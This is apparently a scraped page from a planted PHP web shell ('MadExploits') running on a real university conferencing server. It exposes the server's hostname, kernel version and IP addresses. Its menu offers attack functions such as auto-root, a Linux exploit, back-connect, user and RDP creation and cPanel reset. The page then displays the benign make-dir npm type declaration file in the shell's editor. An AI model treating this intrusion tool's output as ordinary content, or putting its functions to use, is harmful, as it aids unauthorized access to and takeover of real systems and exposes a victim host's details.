Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.145.75.69
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
make-dir /
[ HOME SHELL ]
Name
Size
Permission
Action
index.d.ts
1.52
KB
-rw-r--r--
index.js
3.07
KB
-rw-r--r--
package.json
1.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
/// <reference types="node"/> import * as fs from 'fs'; declare namespace makeDir { interface Options { /** Directory [permissions](https://x-team.com/blog/file-system-permissions-umask-node-js/). @default 0o777 & (~process.umask()) */ readonly mode?: number; /** Use a custom `fs` implementation. For example [`graceful-fs`](https://github.com/isaacs/node-graceful-fs). Using a custom `fs` implementation will block the use of the native `recursive` option if `fs.mkdir` or `fs.mkdirSync` is not the native function. @default require('fs') */ readonly fs?: typeof fs; } } declare const makeDir: { /** Make a directory and its parents if needed - Think `mkdir -p`. @param path - Directory to create. @returns The path to the created directory. @example ``` import makeDir = require('make-dir'); (async () => { const path = await makeDir('unicorn/rainbow/cake'); console.log(path); //=> '/Users/sindresorhus/fun/unicorn/rainbow/cake' // Multiple directories: const paths = await Promise.all([ makeDir('unicorn/rainbow'), makeDir('foo/bar') ]); console.log(paths); // [ // '/Users/sindresorhus/fun/unicorn/rainbow', // '/Users/sindresorhus/fun/foo/bar' // ] })(); ``` */ (path: string, options?: makeDir.Options): Promise<string>; /** Synchronously make a directory and its parents if needed - Think `mkdir -p`. @param path - Directory to create. @returns The path to the created directory. */ sync(path: string, options?: makeDir.Options): string; }; export = makeDir;
Close